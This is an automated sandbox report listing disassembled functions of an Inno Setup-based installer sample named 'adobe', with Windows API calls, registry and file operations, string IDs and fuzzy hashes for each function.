                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: File$BuffersFlush
                                                                                                                                                          • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                                                                          • API String ID: 3593489403-659731555
                                                                                                                                                          • Opcode ID: 39afe94f56613c7813e9b77cb58b190e76c7d606926c66b3316f4738456ce0e9
                                                                                                                                                          • Instruction ID: 6d3af99510feac489041cfa654adec88581dc8f1b33a8ec1f5b56db9886abadc
                                                                                                                                                          • Opcode Fuzzy Hash: 39afe94f56613c7813e9b77cb58b190e76c7d606926c66b3316f4738456ce0e9
                                                                                                                                                          • Instruction Fuzzy Hash: 3F61B834A002988FDB25DF15C891AD9B3B5EF49305F0084EAED899B752D7B4AEC8CF54
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00497270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,0049727E), ref: 0040334B
                                                                                                                                                            • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,0049727E), ref: 00403356
                                                                                                                                                            • Part of subcall function 00406334: GetModuleHandleA.KERNEL32(kernel32.dll,?,00497288), ref: 0040633A
                                                                                                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                                                                            • Part of subcall function 00406334: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                                                                            • Part of subcall function 00406334: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00497288), ref: 0040637E
                                                                                                                                                            • Part of subcall function 00409B88: 6F571CD0.COMCTL32(00497292), ref: 00409B88
                                                                                                                                                            • Part of subcall function 00410964: GetCurrentThreadId.KERNEL32 ref: 004109B2
                                                                                                                                                            • Part of subcall function 00419050: GetVersion.KERNEL32(004972A6), ref: 00419050
                                                                                                                                                            • Part of subcall function 0044EF98: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,004972BA), ref: 0044EFD3
                                                                                                                                                            • Part of subcall function 0044EF98: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044EFD9
                                                                                                                                                            • Part of subcall function 0044F440: GetVersionExA.KERNEL32(0049A790,004972BF), ref: 0044F44F
                                                                                                                                                            • Part of subcall function 00452860: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 00452880
                                                                                                                                                            • Part of subcall function 00452860: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00452886
                                                                                                                                                            • Part of subcall function 00452860: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,004528F9,?,?,?,?,00000000,?,004972C9), ref: 0045289A
                                                                                                                                                            • Part of subcall function 00452860: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004528A0
                                                                                                                                                            • Part of subcall function 004563AC: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004563D0
                                                                                                                                                            • Part of subcall function 00463E1C: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,004972DD), ref: 00463E2B
                                                                                                                                                            • Part of subcall function 00463E1C: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00463E31
                                                                                                                                                            • Part of subcall function 0046BF68: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BF7D
                                                                                                                                                            • Part of subcall function 0047783C: GetModuleHandleA.KERNEL32(kernel32.dll,?,004972E7), ref: 00477842
                                                                                                                                                            • Part of subcall function 0047783C: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 0047784F
                                                                                                                                                            • Part of subcall function 0047783C: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 0047785F
                                                                                                                                                            • Part of subcall function 00494218: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00494231
                                                                                                                                                          • SetErrorMode.KERNEL32(00000001,00000000,0049732F), ref: 00497301
                                                                                                                                                            • Part of subcall function 00497030: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,0049730B,00000001,00000000,0049732F), ref: 0049703A
                                                                                                                                                            • Part of subcall function 00497030: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00497040
                                                                                                                                                            • Part of subcall function 004244E4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 00424503
                                                                                                                                                            • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                          • ShowWindow.USER32(?,00000005,00000000,0049732F), ref: 00497362
                                                                                                                                                            • Part of subcall function 00480D60: SetActiveWindow.USER32(?), ref: 00480E0E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF571FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                                                                          • String ID: Setup
                                                                                                                                                          • API String ID: 3527831634-3839654196
                                                                                                                                                          • Opcode ID: 4be8d2f2216c3d86f53edc2131360f76f4db51df2a18a4688cb56bf2564e711e
                                                                                                                                                          • Instruction ID: 484f7198321d14ea4dea1c0131909a4d2337dd7c7bc9f77692fbd9f4dc694a4d
                                                                                                                                                          • Opcode Fuzzy Hash: 4be8d2f2216c3d86f53edc2131360f76f4db51df2a18a4688cb56bf2564e711e
                                                                                                                                                          • Instruction Fuzzy Hash: A731A2312182009ED6117BB7AC13A1D3A98EB8971CB92447FF80496563DE3D58109A6F
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0041EEB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                                                                          • 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: A25940CurrentThread
                                                                                                                                                          • String ID: R{E
                                                                                                                                                          • API String ID: 2655091166-1510225646
                                                                                                                                                          • Opcode ID: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                                                                                          • Instruction ID: ec4a18813bd70517abb30b2059a031d9bbc12b7253ca3772a6f1eb51880190fd
                                                                                                                                                          • Opcode Fuzzy Hash: 09c792aaf5e5cd869c64275245e25f94cf43b90cc692f754bf4c5a70e034334e
                                                                                                                                                          • Instruction Fuzzy Hash: 42015B75A04708BFD705CF6ADC1195ABBE9E78A720B22C87BEC04D36A0EB345814DE18
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047B2A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047B52A,00000000,0047B540,?,?,?,?,00000000), ref: 0047B306
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Close
                                                                                                                                                          • String ID: RegisteredOrganization$RegisteredOwner
                                                                                                                                                          • API String ID: 3535843008-1113070880
                                                                                                                                                          • Opcode ID: 344431a7a897ba489bc81da4f0ae8848203ff68be56032f65477df9790645a67
                                                                                                                                                          • Instruction ID: 04360fd0e76bd9885b09d18b1896d3c06c7e8dc90750632679e29014fc616a1a
                                                                                                                                                          • Opcode Fuzzy Hash: 344431a7a897ba489bc81da4f0ae8848203ff68be56032f65477df9790645a67
                                                                                                                                                          • Instruction Fuzzy Hash: 18F0BB707041489BDB04D665BD9679F335DD742304F60807BE9059F352DBB89E41C79C
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046DFBC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,;QG,?,0049B178,?,0046E2D3,?,00000000,0046E840,?,_is1), ref: 0046DFDF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value
                                                                                                                                                          • String ID: ;QG$Inno Setup: Setup Version
                                                                                                                                                          • API String ID: 3702945584-3817970878
                                                                                                                                                          • Opcode ID: 356762e7fd68e90c015ef2c04776612547d7a1a591e261247c21e3013bed61cd
                                                                                                                                                          • Instruction ID: f3050d33c5814ab6aa431b6cc648485a2c40fd7aee5bec7ab5b075e1bccb7de3
                                                                                                                                                          • Opcode Fuzzy Hash: 356762e7fd68e90c015ef2c04776612547d7a1a591e261247c21e3013bed61cd
                                                                                                                                                          • Instruction Fuzzy Hash: 62E06D717016043FD710AA6B9C85F5BBADCDF98365F10403AB908DB392DA78DD0081A8
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0047433C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474573), ref: 00474361
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00474573), ref: 00474378
                                                                                                                                                            • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                          • String ID: CreateFile
                                                                                                                                                          • API String ID: 2528220319-823142352
                                                                                                                                                          • Opcode ID: cd42257a27c49996d210445f433f04bc23901129519cbf83be0bd647b84f5f4d
                                                                                                                                                          • Instruction ID: f02aa6a343f6253f7681c42d3745bad7d3df1daa7690a22d1e3a4974fa48f9f3
                                                                                                                                                          • Opcode Fuzzy Hash: cd42257a27c49996d210445f433f04bc23901129519cbf83be0bd647b84f5f4d
                                                                                                                                                          • Instruction Fuzzy Hash: 4FE06D343803447FEA10EA69CCC6F5A77889B04728F108152BA48AF3E2C6B9FC408618
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042DD44 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18registryCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,[!H,?,00000001,?,?,0048215B,?,00000001,00000000), ref: 0042DD60
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Open
                                                                                                                                                          • String ID: System\CurrentControlSet\Control\Windows$[!H
                                                                                                                                                          • API String ID: 71445658-1940484145
                                                                                                                                                          • Opcode ID: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                                                                                          • Instruction ID: aea9d63627e202933d8ac4c6cad7c964b34c473e1f77024d29d81bfc1069fbec
                                                                                                                                                          • Opcode Fuzzy Hash: 11c611a566f6cd60f6ca4cad85dc4867506d66b11241b25e540668e5f726788d
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD09E72920128BB9B009A89DC41DF7775DDB19760F44401AF90497141C1B4AC5197E4
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 004563AC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0045633C: CoInitialize.OLE32(00000000), ref: 00456342
                                                                                                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004563D0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorInitializeLibraryLoadModeProc
                                                                                                                                                          • String ID: SHCreateItemFromParsingName$shell32.dll
                                                                                                                                                          • API String ID: 2906209438-2320870614
                                                                                                                                                          • Opcode ID: 8eb7e1381b7e672ad2a7344b2bac27be7e78fa256b825852c662775a39c4309b
                                                                                                                                                          • Instruction ID: 1abb1b48a8e62328c6f092af9ad77e929cec705f494ad64131ae41d6fe2497e3
                                                                                                                                                          • Opcode Fuzzy Hash: 8eb7e1381b7e672ad2a7344b2bac27be7e78fa256b825852c662775a39c4309b
                                                                                                                                                          • Instruction Fuzzy Hash: FCC012A0700210968A0033BA040220F18189B4071AB92803FB804EB19BDE7D880A8A6E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0046BF68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0042E2BC: SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                                                                            • Part of subcall function 0042E2BC: LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046BF7D
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorLibraryLoadModeProc
                                                                                                                                                          • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                          • API String ID: 2492108670-2683653824
                                                                                                                                                          • Opcode ID: 08c210e061ed3df4adb01dd349e0985179ba97b5dde0629fc048e166c27f437f
                                                                                                                                                          • Instruction ID: a4db22b894df409b76fade00448711417f6f44e3f9dbbe63c1fbbb1ae142da4b
                                                                                                                                                          • Opcode Fuzzy Hash: 08c210e061ed3df4adb01dd349e0985179ba97b5dde0629fc048e166c27f437f
                                                                                                                                                          • Instruction Fuzzy Hash: A9B092A0700680C2CB0877B76C0270B1518D781704B60C07F7080EB6E6EBBC88464FEE
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00480414 Relevance: 4.6, APIs: 3, Instructions: 98windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetSystemMenu.USER32(00000000,00000000,00000000,0048054C), ref: 004804E4
                                                                                                                                                          • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 004804F5
                                                                                                                                                          • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 0048050D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Menu$Append$System
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1489644407-0
                                                                                                                                                          • Opcode ID: bbca4fd67f39214df91e3fd5a169f9f242fc7eb865d7f9f610c6779bc50a8817
                                                                                                                                                          • Instruction ID: 37bc61f9525b2f85d35cba9275b34e96d04578a8d39959fdf84d3e6d1fe946b0
                                                                                                                                                          • Opcode Fuzzy Hash: bbca4fd67f39214df91e3fd5a169f9f242fc7eb865d7f9f610c6779bc50a8817
                                                                                                                                                          • Instruction Fuzzy Hash: 2D31CF303543406AD721FB369C86BAF3A949B1171CF44087BF900AA2D3CA7C9C4987AD
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 0042440C Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424422
                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0042449F
                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 004244A9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$DispatchPeekTranslate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4217535847-0
                                                                                                                                                          • Opcode ID: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                                                                          • Instruction ID: 520fb342982be2dd3794930026bb259c1cd38a4fe19eb968f01b3c53081bdda3
                                                                                                                                                          • Opcode Fuzzy Hash: 57886541ca2a25700c9c74098ac3e1b954634baf7139c1061c5cdbc3fad4e66a
                                                                                                                                                          • Instruction Fuzzy Hash: 781191307043205AEE20FA64AD41B9B73D4DFD1708F80481EF9D997382D77D9E49879A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Function 00416654 Relevance: 4.5, APIs: 3, Instructions: 39COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SetPropA.USER32(00000000,00000000), ref: 0041667A
                                                                                                                                                          • SetPropA.USER32(00000000,00000000), ref: 0041668F
                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166B6
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Prop$Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3363284559-0
                                                                                                                                                          • Opcode ID: 8bb14b94ad0c536f8101303e76f95fc424254f815c897ac0610855fcccbe07bb
                                                                                                                                                          • Instruction ID: 52b24e3238e4314aade48f96f4600562d70e15a3c995b5dbeb32d15e299d8853
                                                                                                                                                          • Opcode Fuzzy Hash: 8bb14b94ad0c536f8101303e76f95fc424254f815c897ac0610855fcccbe07bb
